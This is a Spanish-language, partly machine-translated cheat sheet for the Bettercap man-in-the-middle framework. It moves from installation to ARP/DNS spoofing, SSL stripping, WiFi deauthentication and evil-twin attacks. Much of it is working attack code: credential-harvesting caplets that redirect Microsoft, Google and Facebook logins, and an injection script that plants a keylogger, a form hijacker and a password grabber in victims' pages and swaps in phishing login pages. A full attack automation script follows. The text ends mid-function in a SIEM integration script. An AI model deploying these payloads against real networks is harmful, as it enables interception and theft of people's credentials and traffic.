Bettercap
Mejorcap Cheat Sheet
__HTML_TAG_21_ Todos los comandos
Overview¶
Bettercap es un potente, modular y portátil red de reconocimiento y MITM (Man-in-the-Middle) marco de ataque diseñado para investigadores de seguridad, testadores de penetración y administradores de red. Originalmente desarrollado como un reemplazo moderno para Ettercap, Bettercap se ha convertido en una plataforma integral de pruebas de seguridad de red que combina múltiples vectores de ataque y técnicas de reconocimiento en un marco único y unificado. La herramienta está escrita en Go, haciéndolo altamente portátil y eficiente en diferentes sistemas operativos y arquitecturas.
La arquitectura modular del marco permite a los usuarios cargar y ejecutar módulos específicos para diferentes tipos de ataques de red y actividades de reconocimiento. Bettercap es compatible con una amplia gama de protocolos y técnicas de ataque, incluyendo la espoofía ARP, la espoofía DNS, la espoofía DHCP, ataques inalámbricos, ataques Bluetooth Low Energy (BLE) y ataques HTTP/HTTPS proxy. Este enfoque integral lo convierte en una herramienta invaluable para los profesionales de seguridad que necesitan evaluar la seguridad de la red desde múltiples ángulos e identificar vulnerabilidades en diferentes capas de red.
Una de las fortalezas clave de Bettercap es su interfaz de usuario basada en web en tiempo real, que proporciona un panel intuitivo para monitorizar y controlar ataques. La interfaz de usuario web muestra tráfico de red en vivo, credenciales capturadas, hosts descubiertos y estado de ataque en un formato fácil de entender. Además, Bettercap incluye potentes capacidades de scripting a través de su motor JavaScript, permitiendo a los usuarios crear escenarios de ataque personalizados y automatizar procedimientos complejos de pruebas. Con su comunidad de desarrollo activo y actualizaciones regulares, Bettercap sigue evolucionando como uno de los marcos de pruebas de seguridad de red más versátiles y eficaces disponibles.
Instalación¶
Ubuntu/Debian Instalación¶
Instalar Bettercap en los sistemas Ubuntu/Debian:
# Update system packages
sudo apt update && sudo apt upgrade -y
# Install required dependencies
sudo apt install -y build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev \
git wget curl
# Install Go (required for building from source)
wget https://golang.org/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc
source ~/.bashrc
# Verify Go installation
go version
# Install Bettercap using Go
go install github.com/bettercap/bettercap@latest
# Add Go bin to PATH
echo 'export PATH=$PATH:$(go env GOPATH)/bin' >> ~/.bashrc
source ~/.bashrc
# Alternative: Install pre-compiled binary
wget https://github.com/bettercap/bettercap/releases/latest/download/bettercap_linux_amd64_v2.32.0.zip
unzip bettercap_linux_amd64_v2.32.0.zip
sudo mv bettercap /usr/local/bin/
sudo chmod +x /usr/local/bin/bettercap
# Install UI dependencies (optional)
sudo apt install -y nodejs npm
sudo npm install -g @bettercap/ui
# Create bettercap user (optional)
sudo useradd -r -s /bin/false bettercap
sudo usermod -a -G bettercap $USER
# Set capabilities for non-root execution
sudo setcap cap_net_raw,cap_net_admin=eip /usr/local/bin/bettercap
# Verify installation
bettercap -version
CentOS/RHEL Instalación¶
# Install EPEL repository
sudo yum install -y epel-release
# Install required packages
sudo yum groupinstall -y "Development Tools"
sudo yum install -y libpcap-devel libusb-devel libnetfilter_queue-devel \
git wget curl
# Install Go
wget https://golang.org/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc
source ~/.bashrc
# Install Bettercap
go install github.com/bettercap/bettercap@latest
# Set capabilities
sudo setcap cap_net_raw,cap_net_admin=eip $(go env GOPATH)/bin/bettercap
# Configure firewall
sudo firewall-cmd --permanent --add-port=80/tcp
sudo firewall-cmd --permanent --add-port=443/tcp
sudo firewall-cmd --permanent --add-port=8080/tcp
sudo firewall-cmd --reload
macOS Instalación¶
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install dependencies
brew install libpcap
# Install Go
brew install go
# Install Bettercap
go install github.com/bettercap/bettercap@latest
# Alternative: Install via Homebrew
brew install bettercap
# Verify installation
bettercap -version
Docker Instalación¶
Correndo Bettercap en Docker:
# Pull official Bettercap Docker image
docker pull bettercap/bettercap
# Run Bettercap in Docker with network access
docker run -it --rm --privileged --net=host \
-v $(pwd):/app \
bettercap/bettercap
# Run with web UI
docker run -it --rm --privileged --net=host \
-p 80:80 -p 443:443 \
-v $(pwd):/app \
bettercap/bettercap \
-iface eth0 -caplet http-ui
# Create custom Dockerfile
cat > Dockerfile.bettercap ``<< 'EOF'
FROM golang:1.21-alpine AS builder
# Install dependencies
RUN apk add --no-cache git build-base libpcap-dev libusb-dev linux-headers
# Build Bettercap
RUN go install github.com/bettercap/bettercap@latest
FROM alpine:latest
# Install runtime dependencies
RUN apk add --no-cache libpcap libusb iptables
# Copy binary
COPY --from=builder /go/bin/bettercap /usr/local/bin/
# Create working directory
WORKDIR /app
# Expose ports
EXPOSE 80 443 8080
# Default command
CMD ["bettercap"]
EOF
# Build custom image
docker build -f Dockerfile.bettercap -t custom-bettercap .
# Run custom image
docker run -it --rm --privileged --net=host custom-bettercap
Instalación de Windows¶
# Install using Chocolatey
choco install golang
choco install git
# Install Bettercap
go install github.com/bettercap/bettercap@latest
# Alternative: Download pre-compiled binary
# Download from: https://github.com/bettercap/bettercap/releases
# Extract to C:\Program Files\Bettercap\
# Install WinPcap or Npcap (required for packet capture)
# Download from: https://npcap.com/
# Add to PATH
$env:PATH += ";C:\Program Files\Bettercap"
# Verify installation
bettercap.exe -version
Uso básico¶
Network Discovery¶
Reconocimiento y descubrimiento de redes básicas:
# Start Bettercap with automatic interface detection
sudo bettercap
# Specify network interface
sudo bettercap -iface eth0
# Enable network discovery
sudo bettercap -iface eth0
>`` net.probe on
> net.show
# Discover hosts with specific probes
> set net.probe.mdns true
> set net.probe.nbns true
> set net.probe.upnp true
> set net.probe.wsd true
> net.probe on
# Show discovered hosts
> hosts.show
# Show network statistics
> net.stats
# Continuous host discovery
> set ticker.period 1
> set ticker.commands "clear; net.show; hosts.show"
> ticker on
# Save discovered hosts
> hosts.save /tmp/discovered_hosts.json
# Load previously saved hosts
> hosts.load /tmp/discovered_hosts.json
ARP Spoofing¶
Realización de ataques ARP:
# Basic ARP spoofing setup
sudo bettercap -iface eth0
# Enable ARP spoofing for entire subnet
> arp.spoof on
# Target specific hosts
> set arp.spoof.targets 192.168.1.100,192.168.1.101
> arp.spoof on
# Spoof specific gateway
> set arp.spoof.fullduplex false
> set arp.spoof.targets 192.168.1.1
> arp.spoof on
# Monitor ARP spoofing status
> arp.spoof.stats
# Advanced ARP spoofing with custom intervals
> set arp.spoof.interval 1s
> set arp.spoof.silent false
> arp.spoof on
# Whitelist specific hosts (exclude from spoofing)
> set arp.spoof.whitelist 192.168.1.50,192.168.1.51
> arp.spoof on
# Stop ARP spoofing
> arp.spoof off
# Ban specific hosts (disconnect them)
> arp.ban 192.168.1.100
> arp.unban 192.168.1.100
DNS Esposo¶
DNS cuchara y redirección:
# Enable DNS spoofing
sudo bettercap -iface eth0
> dns.spoof on
# Spoof specific domains
> set dns.spoof.domains example.com,*.google.com
> set dns.spoof.address 192.168.1.50
> dns.spoof on
# Use custom DNS spoofing rules
> set dns.spoof.hosts /tmp/dns_hosts.txt
> dns.spoof on
# Create custom DNS hosts file
cat > /tmp/dns_hosts.txt << 'EOF'
# Custom DNS spoofing rules
example.com 192.168.1.50
*.facebook.com 192.168.1.51
login.microsoft.com 192.168.1.52
EOF
# Advanced DNS spoofing with logging
> set dns.spoof.silent false
> set dns.spoof.domains *
> dns.spoof on
# Monitor DNS queries
> events.stream on
# Stop DNS spoofing
> dns.spoof off
HTTP/HTTPS Proxy¶
Configuración de HTTP/HTTPS proxy para la interceptación de tráfico:
# Enable HTTP proxy
sudo bettercap -iface eth0
> http.proxy on
# Enable HTTPS proxy with SSL stripping
> https.proxy on
> set https.proxy.sslstrip true
# Custom proxy port
> set http.proxy.port 8080
> set https.proxy.port 8443
> http.proxy on
> https.proxy on
# Inject custom JavaScript
> set http.proxy.script /tmp/inject.js
> http.proxy on
# Create JavaScript injection script
cat > /tmp/inject.js << 'EOF'
function onRequest(req, res) \\\\{
log("Request: " + req.Method + " " + req.URL);
// Log headers
for (var name in req.Headers) \\\\{
log("Header: " + name + " = " + req.Headers[name]);
\\\\}
\\\\}
function onResponse(req, res) \\\\{
log("Response: " + res.Status + " for " + req.URL);
// Inject custom content
if (res.ContentType.indexOf("text/html") == 0) \\\\{
var body = res.ReadBody();
var newBody = body.replace("</body>",
"<script>alert('Injected by Bettercap');</script></body>");
res.Body = newBody;
\\\\}
\\\\}
EOF
# Monitor proxy traffic
> events.stream on
# Save captured data
> http.proxy.dump /tmp/http_traffic.log
Características avanzadas¶
Ataques inalámbricos¶
Reconocimiento y ataques WiFi:
# Enable WiFi monitoring mode (requires compatible adapter)
sudo bettercap -iface wlan0
# Start WiFi reconnaissance
> wifi.recon on
# Show discovered access points
> wifi.show
# Show connected clients
> wifi.show.clients
# Target specific access point
> wifi.recon.channel 6
> set wifi.recon.channel 6
> wifi.recon on
# Deauthentication attack
> set wifi.deauth.targets aa:bb:cc:dd:ee:ff
> wifi.deauth
# Handshake capture
> set wifi.handshakes.file /tmp/handshakes.pcap
> wifi.recon on
# Evil twin attack
> set wifi.ap.ssid "Free WiFi"
> set wifi.ap.bssid aa:bb:cc:dd:ee:ff
> set wifi.ap.channel 6
> wifi.ap
# WPS attacks
> wifi.recon on
> wifi.show
> set wifi.wps.targets aa:bb:cc:dd:ee:ff
> wifi.wps
# Monitor WiFi events
> events.stream on
Bluetooth Low Energy (BLE) Attacks¶
BLE reconocimiento y ataques:
# Enable BLE reconnaissance
sudo bettercap
> ble.recon on
# Show discovered BLE devices
> ble.show
# Enumerate BLE device services
> ble.enum aa:bb:cc:dd:ee:ff
# Write to BLE characteristics
> ble.write aa:bb:cc:dd:ee:ff 1800 2a00 "payload"
# Clone BLE device
> set ble.clone.target aa:bb:cc:dd:ee:ff
> ble.clone
# Monitor BLE events
> events.stream on
# Save BLE scan results
> ble.save /tmp/ble_devices.json
Custom Caplets¶
Creación y uso de caplets personalizados ( scripts de automatización):
# Create basic reconnaissance caplet
cat > /tmp/recon.cap << 'EOF'
# Basic network reconnaissance caplet
# Set interface
set $ \\\\{by_name eth0\\\\}
# Enable network discovery
set net.probe.mdns true
set net.probe.nbns true
set net.probe.upnp true
net.probe on
# Enable ARP spoofing for entire subnet
arp.spoof on
# Enable DNS spoofing
set dns.spoof.domains *
set dns.spoof.address \\\\{interface.ipv4\\\\}
dns.spoof on
# Enable HTTP proxy
set http.proxy.script /tmp/inject.js
http.proxy on
# Enable HTTPS proxy with SSL stripping
set https.proxy.sslstrip true
https.proxy on
# Start event streaming
events.stream on
# Display status every 5 seconds
set ticker.period 5
set ticker.commands "clear; net.show; hosts.show"
ticker on
EOF
# Run caplet
sudo bettercap -caplet /tmp/recon.cap
# Create advanced MITM caplet
cat > /tmp/mitm.cap << 'EOF'
# Advanced MITM attack caplet
# Variables
set $TARGET 192.168.1.100
set $GATEWAY 192.168.1.1
set $INTERFACE eth0
# Set interface
set $ \\\\{by_name $INTERFACE\\\\}
# Target specific host
set arp.spoof.targets $TARGET
set arp.spoof.fullduplex true
arp.spoof on
# DNS spoofing for specific domains
set dns.spoof.domains facebook.com,*.facebook.com,google.com,*.google.com
set dns.spoof.address \\\\{interface.ipv4\\\\}
dns.spoof on
# HTTP/HTTPS proxy with custom script
set http.proxy.script /tmp/advanced_inject.js
http.proxy on
set https.proxy.sslstrip true
set https.proxy.script /tmp/advanced_inject.js
https.proxy on
# Logging
set http.proxy.dump /tmp/http_dump.log
set https.proxy.dump /tmp/https_dump.log
# Events
events.stream on
EOF
# Create credential harvesting caplet
cat > /tmp/harvest.cap << 'EOF'
# Credential harvesting caplet
# Set interface
set $ \\\\{by_name eth0\\\\}
# ARP spoofing
arp.spoof on
# DNS spoofing to redirect login pages
set dns.spoof.domains login.microsoft.com,accounts.google.com,www.facebook.com
set dns.spoof.address \\\\{interface.ipv4\\\\}
dns.spoof on
# HTTP proxy with credential extraction
set http.proxy.script /tmp/harvest.js
http.proxy on
# HTTPS proxy
set https.proxy.sslstrip true
set https.proxy.script /tmp/harvest.js
https.proxy on
# Start web server for phishing pages
set http.server.path /tmp/phishing
set http.server.port 80
http.server on
events.stream on
EOF
# Run specific caplet
sudo bettercap -caplet /tmp/mitm.cap -iface eth0
JavaScript Módulos¶
Módulos avanzados de JavaScript para ataques personalizados:
// Advanced HTTP/HTTPS injection script
// File: /tmp/advanced_inject.js
var credentials = [];
var sessions = \\\\{\\\\};
function onLoad() \\\\{
log("Advanced injection module loaded");
\\\\}
function onRequest(req, res) \\\\{
var url = req.URL;
var method = req.Method;
var host = req.Hostname;
log("[" + method + "] " + host + url);
// Log interesting headers
if (req.Headers["Authorization"]) \\\\{
log("Authorization header found: " + req.Headers["Authorization"]);
\\\\}
if (req.Headers["Cookie"]) \\\\{
log("Cookies: " + req.Headers["Cookie"]);
sessions[host] = req.Headers["Cookie"];
\\\\}
// Extract POST data for credential harvesting
if (method == "POST" && req.Body) \\\\{
var body = req.ReadBody();
log("POST data: " + body);
// Look for common credential fields
if (body.indexOf("password") != -1||body.indexOf("passwd") != -1) \\\\{
log("Potential credentials captured: " + body);
credentials.push(\\\\{
host: host,
url: url,
data: body,
timestamp: new Date().toISOString()
\\\\});
// Save credentials to file
writeFile("/tmp/credentials.json", JSON.stringify(credentials, null, 2));
\\\\}
\\\\}
\\\\}
function onResponse(req, res) \\\\{
var contentType = res.ContentType;
var url = req.URL;
var host = req.Hostname;
log("Response: " + res.Status + " for " + url);
// Inject into HTML pages
if (contentType.indexOf("text/html") == 0) \\\\{
var body = res.ReadBody();
// Inject keylogger
var keylogger = `
<script>
var keys = [];
document.addEventListener('keydown', function(e) \\{
keys.push(\\{
key: e.key,
timestamp: new Date().toISOString(),
url: window.location.href
\\});
// Send to attacker server every 50 keystrokes
if (keys.length >= 50) \\{
fetch('/keylog', \\{
method: 'POST',
body: JSON.stringify(keys),
headers: \\{'Content-Type': 'application/json'\\}
\\});
keys = [];
\\}
\\});
// Send on page unload
window.addEventListener('beforeunload', function() \\{
if (keys.length > 0) \\{
navigator.sendBeacon('/keylog', JSON.stringify(keys));
\\}
\\});
</script>
`;
// Inject form hijacker
var formHijacker = `
<script>
document.addEventListener('DOMContentLoaded', function() \\{
var forms = document.querySelectorAll('form');
forms.forEach(function(form) \\{
form.addEventListener('submit', function(e) \\{
var formData = new FormData(form);
var data = \\{\\};
for (var pair of formData.entries()) \\{
data[pair[0]] = pair[1];
\\}
fetch('/formdata', \\{
method: 'POST',
body: JSON.stringify(\\{
url: window.location.href,
data: data,
timestamp: new Date().toISOString()
\\}),
headers: \\{'Content-Type': 'application/json'\\}
\\});
\\});
\\});
\\});
</script>
`;
// Inject scripts before closing body tag
body = body.replace("</body>", keylogger + formHijacker + "</body>");
// Replace login pages with phishing pages
if (url.indexOf("login") != -1||url.indexOf("signin") != -1) \\\\{
body = createPhishingPage(host, url);
\\\\}
res.Body = body;
\\\\}
// Modify JavaScript files
if (contentType.indexOf("application/javascript") == 0||
contentType.indexOf("text/javascript") == 0) \\\\{
var body = res.ReadBody();
// Inject malicious code into JavaScript
var maliciousCode = `
// Injected by Bettercap
setInterval(function() \\{
if (document.querySelector('input[type="password"]')) \\{
var passwords = document.querySelectorAll('input[type="password"]');
passwords.forEach(function(p) \\{
if (p.value) \\{
fetch('/password', \\{
method: 'POST',
body: JSON.stringify(\\{
url: window.location.href,
password: p.value,
timestamp: new Date().toISOString()
\\}),
headers: \\{'Content-Type': 'application/json'\\}
\\});
\\}
\\});
\\}
\\}, 5000);
`;
body = maliciousCode + "\n" + body;
res.Body = body;
\\\\}
\\\\}
function createPhishingPage(host, url) \\\\{
return `
<!DOCTYPE html>
<html>
<head>
<title>Login - $\\{host\\}</title>
<style>
body \\{ font-family: Arial, sans-serif; margin: 50px; \\}
.login-form \\{ max-width: 400px; margin: 0 auto; padding: 20px; border: 1px solid #ddd; \\}
input \\{ width: 100%; padding: 10px; margin: 10px 0; \\}
button \\{ width: 100%; padding: 10px; background: #007cba; color: white; border: none; \\}
</style>
</head>
<body>
<div class="login-form">
<h2>Sign In</h2>
<form action="/phish" method="POST">
<input type="hidden" name="original_url" value="$\\{url\\}">
<input type="text" name="username" placeholder="Username" required>
<input type="password" name="password" placeholder="Password" required>
<button type="submit">Sign In</button>
</form>
</div>
<script>
document.querySelector('form').addEventListener('submit', function(e) \\{
e.preventDefault();
var formData = new FormData(this);
var data = \\{\\};
for (var pair of formData.entries()) \\{
data[pair[0]] = pair[1];
\\}
fetch('/phish', \\{
method: 'POST',
body: JSON.stringify(data),
headers: \\{'Content-Type': 'application/json'\\}
\\}).then(function() \\{
window.location.href = data.original_url;
\\});
\\});
</script>
</body>
</html>
`;
\\\\}
function writeFile(path, content) \\\\{
// This is a placeholder - actual file writing would need to be implemented
// in the Bettercap JavaScript engine
log("Writing to file: " + path);
\\\\}
Network Monitoring¶
Seguimiento y análisis avanzados de la red:
# Create comprehensive monitoring caplet
cat > /tmp/monitor.cap << 'EOF'
# Network monitoring caplet
# Set interface
set $ \\\\{by_name eth0\\\\}
# Enable comprehensive network discovery
set net.probe.mdns true
set net.probe.nbns true
set net.probe.upnp true
set net.probe.wsd true
set net.probe.throttle 100
net.probe on
# Enable packet sniffing
set net.sniff.verbose true
set net.sniff.local true
set net.sniff.filter "tcp port 80 or tcp port 443 or tcp port 21 or tcp port 22"
set net.sniff.output /tmp/captured_packets.pcap
net.sniff on
# Monitor specific protocols
set syn.scan.targets 192.168.1.0/24
set syn.scan.ports 22,80,443,3389,5900
syn.scan
# Enable GPS tracking (if available)
gps on
# Set up event logging
events.stream on
set events.stream.output /tmp/bettercap_events.log
# Display comprehensive status
set ticker.period 10
set ticker.commands "clear; net.show; hosts.show; syn.scan.show"
ticker on
EOF
# Run monitoring caplet
sudo bettercap -caplet /tmp/monitor.cap
# Real-time traffic analysis
sudo bettercap -iface eth0
> set net.sniff.verbose true
> set net.sniff.regexp ".*password.*|.*login.*|.*auth.*"
> net.sniff on
# Protocol-specific monitoring
> set net.sniff.filter "tcp port 21" # FTP
> set net.sniff.filter "tcp port 23" # Telnet
> set net.sniff.filter "tcp port 110" # POP3
> set net.sniff.filter "tcp port 143" # IMAP
> net.sniff on
Automation Scripts¶
Ataque completo Script¶
#!/bin/bash
# Comprehensive Bettercap automation script
# Configuration
INTERFACE="eth0"
TARGET_NETWORK="192.168.1.0/24"
ATTACK_TYPE="mitm"
OUTPUT_DIR="/tmp/bettercap_$(date +%Y%m%d_%H%M%S)"
LOG_FILE="$OUTPUT_DIR/attack.log"
# Create output directory
mkdir -p "$OUTPUT_DIR"
# Logging function
log_message() \\\\{
echo "$(date '+%Y-%m-%d %H:%M:%S') - $1"|tee -a "$LOG_FILE"
\\\\}
# Check if running as root
check_root() \\\\{
if [ "$EUID" -ne 0 ]; then
echo "This script must be run as root"
exit 1
fi
\\\\}
# Check dependencies
check_dependencies() \\\\{
log_message "Checking dependencies..."
if ! command -v bettercap >/dev/null 2>&1; then
log_message "ERROR: Bettercap not found"
exit 1
fi
if ! ip link show "$INTERFACE" >/dev/null 2>&1; then
log_message "ERROR: Interface $INTERFACE not found"
exit 1
fi
log_message "Dependencies check passed"
\\\\}
# Network reconnaissance
network_recon() \\\\{
log_message "Starting network reconnaissance..."
cat > "$OUTPUT_DIR/recon.cap" << EOF
# Network reconnaissance caplet
set \$ \\\\{by_name $INTERFACE\\\\}
# Enable comprehensive discovery
set net.probe.mdns true
set net.probe.nbns true
set net.probe.upnp true
set net.probe.wsd true
net.probe on
# Save discovered hosts
hosts.save $OUTPUT_DIR/discovered_hosts.json
# Port scanning
set syn.scan.targets $TARGET_NETWORK
set syn.scan.ports 22,23,25,53,80,110,143,443,993,995,3389,5900
syn.scan
# Save scan results
syn.scan.save $OUTPUT_DIR/port_scan.json
# Run for 60 seconds
sleep 60
# Stop and exit
net.probe off
quit
EOF
timeout 120 bettercap -caplet "$OUTPUT_DIR/recon.cap" 2>&1|tee -a "$LOG_FILE"
log_message "Network reconnaissance completed"
\\\\}
# MITM attack
mitm_attack() \\\\{
local target="$1"
log_message "Starting MITM attack against $target..."
cat > "$OUTPUT_DIR/mitm.cap" << EOF
# MITM attack caplet
set \$ \\\\{by_name $INTERFACE\\\\}
# Target specific host
set arp.spoof.targets $target
set arp.spoof.fullduplex true
arp.spoof on
# DNS spoofing
set dns.spoof.domains *
set dns.spoof.address \\\\{interface.ipv4\\\\}
dns.spoof on
# HTTP proxy with logging
set http.proxy.script $OUTPUT_DIR/inject.js
set http.proxy.dump $OUTPUT_DIR/http_traffic.log
http.proxy on
# HTTPS proxy with SSL stripping
set https.proxy.sslstrip true
set https.proxy.script $OUTPUT_DIR/inject.js
set https.proxy.dump $OUTPUT_DIR/https_traffic.log
https.proxy on
# Packet capture
set net.sniff.output $OUTPUT_DIR/packets.pcap
set net.sniff.verbose false
net.sniff on
# Event logging
events.stream on
set events.stream.output $OUTPUT_DIR/events.log
# Status updates
set ticker.period 30
set ticker.commands "hosts.show; arp.spoof.stats"
ticker on
EOF
# Create injection script
cat > "$OUTPUT_DIR/inject.js" << 'EOF'
var credentials = [];
function onRequest(req, res) \\\\{
log("[REQ] " + req.Method + " " + req.URL);
if (req.Method == "POST" && req.Body) \\\\{
var body = req.ReadBody();
if (body.indexOf("password") != -1||body.indexOf("login") != -1) \\\\{
log("Potential credentials: " + body);
credentials.push(\\\\{
url: req.URL,
data: body,
timestamp: new Date().toISOString()
\\\\});
\\\\}
\\\\}
\\\\}
function onResponse(req, res) \\\\{
if (res.ContentType.indexOf("text/html") == 0) \\\\{
var body = res.ReadBody();
var injection = '<script>console.log("Injected by Bettercap");</script>';
body = body.replace("</body>", injection + "</body>");
res.Body = body;
\\\\}
\\\\}
EOF
# Run MITM attack
bettercap -caplet "$OUTPUT_DIR/mitm.cap" 2>&1|tee -a "$LOG_FILE" &
BETTERCAP_PID=$!
log_message "MITM attack started (PID: $BETTERCAP_PID)"
# Run for specified duration or until interrupted
local duration=$\\\\{ATTACK_DURATION:-300\\\\} # 5 minutes default
sleep "$duration"
# Stop attack
kill $BETTERCAP_PID 2>/dev/null
log_message "MITM attack stopped"
\\\\}
# WiFi attacks
wifi_attack() \\\\{
local wifi_interface="$1"
log_message "Starting WiFi attacks on $wifi_interface..."
cat > "$OUTPUT_DIR/wifi.cap" << EOF
# WiFi attack caplet
set \$ \\\\{by_name $wifi_interface\\\\}
# WiFi reconnaissance
wifi.recon on
# Save discovered networks
wifi.save $OUTPUT_DIR/wifi_networks.json
# Handshake capture
set wifi.handshakes.file $OUTPUT_DIR/handshakes.pcap
# Run for 5 minutes
sleep 300
# Stop and save
wifi.recon off
quit
EOF
timeout 360 bettercap -caplet "$OUTPUT_DIR/wifi.cap" 2>&1|tee -a "$LOG_FILE"
log_message "WiFi attacks completed"
\\\\}
# Generate report
generate_report() \\\\{
log_message "Generating attack report..."
local report_file="$OUTPUT_DIR/attack_report.html"
cat > "$report_file" << EOF
<!DOCTYPE html>
<html>
<head>
<title>Bettercap Attack Report</title>
<style>
body \\\\{ font-family: Arial, sans-serif; margin: 20px; \\\\}
.section \\\\{ margin: 20px 0; padding: 15px; border: 1px solid #ddd; \\\\}
.data \\\\{ background: #f5f5f5; padding: 10px; font-family: monospace; \\\\}
table \\\\{ border-collapse: collapse; width: 100%; \\\\}
th, td \\\\{ border: 1px solid #ddd; padding: 8px; text-align: left; \\\\}
th \\\\{ background-color: #f2f2f2; \\\\}
</style>
</head>
<body>
<h1>Bettercap Attack Report</h1>
<p>Generated: $(date)</p>
<p>Target Network: $TARGET_NETWORK</p>
<p>Interface: $INTERFACE</p>
<div class="section">
<h2>Discovered Hosts</h2>
<div class="data">
EOF
if [ -f "$OUTPUT_DIR/discovered_hosts.json" ]; then
cat "$OUTPUT_DIR/discovered_hosts.json" >> "$report_file"
else
echo "No hosts discovered" >> "$report_file"
fi
cat >> "$report_file" << EOF
</div>
</div>
<div class="section">
<h2>Port Scan Results</h2>
<div class="data">
EOF
if [ -f "$OUTPUT_DIR/port_scan.json" ]; then
cat "$OUTPUT_DIR/port_scan.json" >> "$report_file"
else
echo "No port scan results" >> "$report_file"
fi
cat >> "$report_file" << EOF
</div>
</div>
<div class="section">
<h2>Captured Traffic Summary</h2>
<div class="data">
EOF
if [ -f "$OUTPUT_DIR/http_traffic.log" ]; then
echo "HTTP Requests: $(wc -l < "$OUTPUT_DIR/http_traffic.log")" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/https_traffic.log" ]; then
echo "HTTPS Requests: $(wc -l < "$OUTPUT_DIR/https_traffic.log")" >> "$report_file"
fi
if [ -f "$OUTPUT_DIR/packets.pcap" ]; then
echo "Captured Packets: $(tcpdump -r "$OUTPUT_DIR/packets.pcap" 2>/dev/null|wc -l)" >> "$report_file"
fi
cat >> "$report_file" << EOF
</div>
</div>
<div class="section">
<h2>Attack Log</h2>
<div class="data">
<pre>$(tail -n 50 "$LOG_FILE")</pre>
</div>
</div>
</body>
</html>
EOF
log_message "Report generated: $report_file"
\\\\}
# Cleanup function
cleanup() \\\\{
log_message "Cleaning up..."
# Kill any running Bettercap processes
pkill -f bettercap 2>/dev/null
# Reset network settings
echo 0 > /proc/sys/net/ipv4/ip_forward 2>/dev/null
log_message "Cleanup completed"
\\\\}
# Signal handlers
trap cleanup EXIT
trap cleanup INT
trap cleanup TERM
# Main execution
main() \\\\{
log_message "Starting Bettercap automation script"
check_root
check_dependencies
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
case "$ATTACK_TYPE" in
"recon")
network_recon
;;
"mitm")
network_recon
# Extract targets from reconnaissance
if [ -f "$OUTPUT_DIR/discovered_hosts.json" ]; then
# Get first discovered host as target
local target=$(grep -o '"ip":"[^"]*"' "$OUTPUT_DIR/discovered_hosts.json"|head -n 1|cut -d'"' -f4)
if [ -n "$target" ]; then
mitm_attack "$target"
fi
fi
;;
"wifi")
wifi_attack "wlan0"
;;
"full")
network_recon
if [ -f "$OUTPUT_DIR/discovered_hosts.json" ]; then
local target=$(grep -o '"ip":"[^"]*"' "$OUTPUT_DIR/discovered_hosts.json"|head -n 1|cut -d'"' -f4)
if [ -n "$target" ]; then
mitm_attack "$target"
fi
fi
# WiFi attacks if interface available
if ip link show wlan0 >/dev/null 2>&1; then
wifi_attack "wlan0"
fi
;;
*)
log_message "Unknown attack type: $ATTACK_TYPE"
exit 1
;;
esac
generate_report
log_message "Attack completed. Results in: $OUTPUT_DIR"
\\\\}
# Parse command line arguments
while [[ $# -gt 0 ]]; do
case $1 in
-i|--interface)
INTERFACE="$2"
shift 2
;;
-t|--target)
TARGET_NETWORK="$2"
shift 2
;;
-a|--attack)
ATTACK_TYPE="$2"
shift 2
;;
-d|--duration)
ATTACK_DURATION="$2"
shift 2
;;
-h|--help)
echo "Usage: $0 [OPTIONS]"
echo "Options:"
echo " -i, --interface IFACE Network interface (default: eth0)"
echo " -t, --target NETWORK Target network (default: 192.168.1.0/24)"
echo " -a, --attack TYPE Attack type: recon|mitm|wifi|full (default: mitm)"
echo " -d, --duration SECONDS Attack duration (default: 300)"
echo " -h, --help Show this help"
exit 0
;;
*)
echo "Unknown option: $1"
exit 1
;;
esac
done
# Run main function
main
Integración Ejemplos¶
SIEM Integration¶
#!/usr/bin/env python3
# Bettercap SIEM integration script
import json
import time
import requests
import subprocess
from datetime import datetime
import logging
class BettercapSIEMIntegration:
def __init__(self, config):
self.config = config
self.setup_logging()
def setup_logging(self):
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('/var/log/bettercap_siem.log'),
logging.StreamHandler()
]
)
self.logger = logging.getLogger(__name__)
def parse_bettercap_events(self, events_file):
"""Parse Bettercap events log file"""
events = []
try:
with open(events_file, 'r') as f:
for line in f:
if line.strip():
try:
event = json.loads(line)
events.append(self.normalize_event(event))
except json.JSONDecodeError:
# Handle non-JSON log lines
events.append(self.parse_text_event(line))
except FileNotFoundError:
self.logger.error(f"Events file not found: \\\\{events_file\\\\}")
return events
def normalize_event(self, event):
"""Normalize Bettercap event to common format"""
normalized = \\\\{
'timestamp': event.get('time', datetime.now().isoformat()),
'source': 'bettercap',
'event_type': event.get('tag', 'unknown'),
'severity': self.determine_severity(event),
'raw_event': event
\\\\}
# Extract specific fields based on event type
tag = event.get('tag', '')
if tag == 'net.sniff':
normalized.update(\\\\{
'src_ip': event.get('data', \\\\{\\\\}).get('src'),
'dst_ip': event.get('data', \\\\{\\\\}).get('dst'),
'protocol': event.get('data', \\\\{\\\\}).get('protocol'),
'payload': event.get('data', \\\\{\\\\}).get('payload')
\\\\})
elif tag == 'arp.spoof':
normalized.update(\\\\{
'target_ip': event.get('data', \\\\{\\\\}).get('target'),
'gateway_ip': event.get('data', \\\\{\\\\}).get('gateway'),
'attack_type': 'arp_spoofing'
\\\\})
elif tag == 'dns.spoof':
normalized.update(\\\\{
'domain': event.get('data', \\\\{\\\\}).get('domain'),
'spoofed_ip': event.get('data', \\\\{\\\\}).get('address'),
'attack_type': 'dns_spoofing'
\\\\})
elif tag == 'http.proxy':
normalized.update(\\\\{
'method': event.get('data', \\\\{\\\\}).get('method'),
'url': event.get('data', \\\\{\\\\}).get('url'),
'user_agent': event.get('data', \\\\{\\\\}).get('user_agent'),
'attack_type': 'http_interception'
\\\\})
return normalized
def parse_text_event(self, line):
"""Parse non-JSON log lines"""
return \\\\{
'timestamp': datetime.now().isoformat(),
'source': 'bettercap',
'event_type': 'log',
'severity': 'info',
'message': line.strip()
\\\\}
def determine_severity(self, event):
